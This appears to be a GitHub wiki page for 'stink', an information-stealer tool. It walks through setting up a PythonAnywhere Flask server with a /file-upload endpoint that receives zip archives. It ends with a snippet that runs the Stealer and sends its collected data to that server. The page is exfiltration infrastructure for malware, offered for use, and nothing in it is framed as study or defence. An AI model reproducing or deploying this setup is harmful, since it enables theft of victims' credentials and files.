Server - FallenAstaroth/stink GitHub Wiki

Introduction

A guide on how to set up data sending via the Flask server.

Server creation example

  1. Create a Pythonanywhere account.
  2. Go to the Web tab.

image

  1. Press the add new web application button.

image

  1. Click next and select Flask.

image

  1. Choose one of the versions.

image

  1. Leave the path unchanged.

image

  1. Wait for the installation to complete.
  2. Return to the home page by clicking on the snake logo at the top.
  3. Go to the files.

image

  1. On the left side, click on the mysite directory.

image

  1. Open the file flask_app.py.

image

  1. Delete everything and insert the following code.
from os import path
from pathlib import Path

from flask import Flask, request, jsonify
from werkzeug.utils import secure_filename

THIS_FOLDER = Path(__file__).parent.resolve()
UPLOAD_FOLDER = THIS_FOLDER / "uploads"
ALLOWED_EXTENSIONS = {"zip"}

app = Flask(__name__)
app.secret_key = "stink"
app.config["UPLOAD_FOLDER"] = UPLOAD_FOLDER
app.config["MAX_CONTENT_LENGTH"] = 128 * 1024 * 1024


def allowed_file(filename):
    return "." in filename and filename.rsplit(".", 1)[1].lower() in ALLOWED_EXTENSIONS


@app.route("/file-upload", methods=["POST"])
def upload_file():

    if "document" not in request.files:
        return jsonify({"message": "No file part in the request."}), 400

    file = request.files["document"]

    if file.filename == "":
        return jsonify({"message": "No file selected for uploading."}), 400

    if file and allowed_file(file.filename):
        file.save(path.join(app.config["UPLOAD_FOLDER"], secure_filename(file.filename)))
        return jsonify({"message": "File successfully uploaded."}), 201

    else:
        return jsonify({"message": f"Allowed file types: {','.join(file_type for file_type in ALLOWED_EXTENSIONS)}."}), 400


if __name__ == "__main__":
    app.run()
  1. Go back to the mysite directory.

image

  1. Create the uploads directory.

image

  1. Go back to the Web tab.

image

  1. Click the server restart button.

image

  1. Above the restart button, click on the link.

image

  1. Copy the link from the address bar and add /file-upload after it.

    Example: https://example.pythonanywhere.com/file-upload

Example usage

from stink import Stealer, Senders

if __name__ == '__main__':
    Stealer(senders=[Senders.server(server="YOUR_SERVER")]).run()